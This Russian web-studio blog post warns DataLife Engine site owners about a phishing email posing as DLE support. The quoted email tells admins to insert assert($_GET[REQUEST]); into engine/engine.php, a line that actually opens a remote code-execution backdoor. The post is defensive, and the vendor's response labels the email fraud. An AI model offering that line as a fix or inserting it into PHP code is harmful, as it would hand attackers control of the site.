TCSE веб-студия | Основное | Скрипты и советы | Ваш сайт подвержен взлому! - Взлом сайтов на DLE руками владельцев

Ваш сайт подвержен взлому! - Взлом сайтов на DLE руками владельцев


Социальная инженерия, с помощью которой в последнюю неделю пытаются взломать сайты, созданные на движке DataLife Engine, работает грубо и не прикрыто (как лесть). Тем, более, что сам DLE, имеющий очень низкий порог вхождения для управления сайтом, этому всячески способствует - любая блондинка может поставить себе DLE и вести свой бложик. А то, что багфиксы ВСЕГДА есть на официальном сайте поддержки такие пользователи просто не в курсе.

Если вам через форму обратной связи на вашем сайте прилетело письмо такого содержания:


От: вашсайт.ru
К: mainl@вашсайт.ru
А также к:
Время создания: Wed, 15 Oct 2014 21:42:17 +0400
Тема: Ваш сайт вашсайт.ru подвержен взлому!
Прикрепленные файлы:

Админ., *****

Данное письмо вам отправил support@dle-news.ru с сайта http://вашсайт.ru

------------------------------------------------
Текст сообщения
------------------------------------------------

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте http://вашсайт.ru нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: http://вашсайт.ru/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);


С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213

------------------------------------------------
Помните, что администрация сайта не несет ответственности за содержание данного письма

С уважением,

Администрация http://вашсайт.ru



Вместо http://вашсайт.ru всегда подставляется имя вашего домена.
Что любопытно, такие письма прилетают официальным покупателям движка на сайте разработчиков.
Служба поддержки DLE-news.ru дала следующий комментарий о подобным письмах.

Это мошенники. Это письмо пришло не от нас и не от нашего домена. А просто было отправлено вам с вашего же сайта через обратную связь. Мы никогда не ходим по обратной связи чужих сайтов для уведомления о выходах патчей безопасности, потому как у нас есть прямые E-Mail адреса клиентов, которые указаны в вашем профиле на нашем сайте. И если и выходят патчи безопасности, то мы отправляем уведомления всегда напрямую с нашего сервера, и с указанием соответствующей публикации на нашем сайте с тем или иным патчем.

Все патчи публикуются только на странице http://dle-news.ru/bags/ и ставить нужно патчи только с официального сайта. А это распространение вируса.


Надеюсь, все владельцы сайтов на DataLife Engine примут даную информацию к сведению.

PS:
Социальная инженерия — метод несанкционированного доступа к информационным ресурсам, основанный на особенностях психологии человека. Основной целью социальных инженеров, как и других хакеров и взломщиков, является получение доступа к защищенным системам с целью кражи информации, паролей, данных о кредитных картах и т.п.

Основным отличием от стандартной кибер-атаки является то, что в данном случае в роли объекта атаки выбирается не машина, а ее оператор. Именно поэтому все методы и техники социальных инженеров основываются на использовании слабостей человеческого фактора, что считается крайне разрушительным, так как злоумышленник получает информацию, например, с помощью обычного телефонного разговора или путем проникновения в организацию под видом ее служащего.

Для защиты от атак данного вида следует знать о наиболее распространенных видах мошенничества, понимать, что на самом деле хотят взломщики и своевременно организовывать подходящую политику безопасности.


Уважаемые посетители,
Если Вы хотите оставить заказ на разработку сайта или получить предварительную консультацию воспользуйтесь формой по ссылке ниже.
Обратная связь
Наш специалист ответит вам в течении суток.


16 октября 2014  0 5 210   dle, социальная инженерия Версия для печати


Похожие публикации

Разработка сайта - аренда автомобилей

TCSE-Studio закончила разработку сайта компании АвтоРент.СУ - аренда автомобилей без водителя в Санкт-Петербурге. Сайт реализован на качественном новостном движке, имеет продуманную форму обратной... читать далее

Форма быстрой связи с администрацией сайта для клиентов

Великолепная вебпрога позволяющая разместить на вашем сайте панель с чатом для ваших клиентов сообщения которого будут прилетать в ваш джаббер клиент Написать подробную инструкцию меня сподвигнула... читать далее

alarm2b.ru - корпоративный сайт для автохолдинга "Аларм Моторс"

Новый корпоративный сайт, разработку которого наша студия завершила в очень сжатые сроки (чтобы успеть к 1 сентября 2014 года), заказчик перенес к себе и нашими силами стал его активно наполнять... читать далее

Услуги и расценки

TCSE-CMS с 2006 года занимается разработкой, созданием, поддержкой и продвижением сайтов различной тематики. Все проекты создаются на базе CMS (системы управления контентом, иначе – движке сайта)... читать далее

Как поставить якорь для комментария в DLE 11

Новые теги появившиеся в DataLife Engine 11 наконец-то позволили добавить худо-бедно поддержку якорей для перехода к конкретным комментариям внутри публикации. Думаю многие сталкивались с тем, что в... читать далее

[Перевод] Создание быстрых и более оптимизированных сайтов на WordPress

Большинство потребителей имеют уже сложившееся мнение о том, что касается услуг web-хостинга. Если вы будете искать отзывы о любом хостинг-провайдере, вы обнаружите десятки результатов. И обычно,... читать далее

Прокомментировать


@

  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent

Портфолио 98 Проекты 5 Продукты 33 Мы рекомендуем Советы 1064 Маркетинг и SEO 335 Дизайн-макеты 4 Инструкции 6

Облако тегов
angular CSS css es6 frontend habrahabr.ru html HTML html5 javascript JavaScript js react seo SEO на Хабрахабре skillfactory vue Блог компании RUVDS.com Блог компании SkillFactory Веб-дизайн Дизайн Интернет-маркетинг Поисковая оптимизация Программирование Разработка веб-сайтов Уроки CSS на Хабрахабре автомобильный сайт браузеры верстка вёрстка дайджест интернет-магазин корпоративный сайт модуль мы рекомендуем портфолио разработка ссылки фронтенд

Показать все теги

Архив сайта

Реклама на сайте
Студия создания и продвижения сайтов hover.com.ua . Кт позвоночника в краснодаре адреса и цены. Мрт в городе краснодар адреса Клиницист.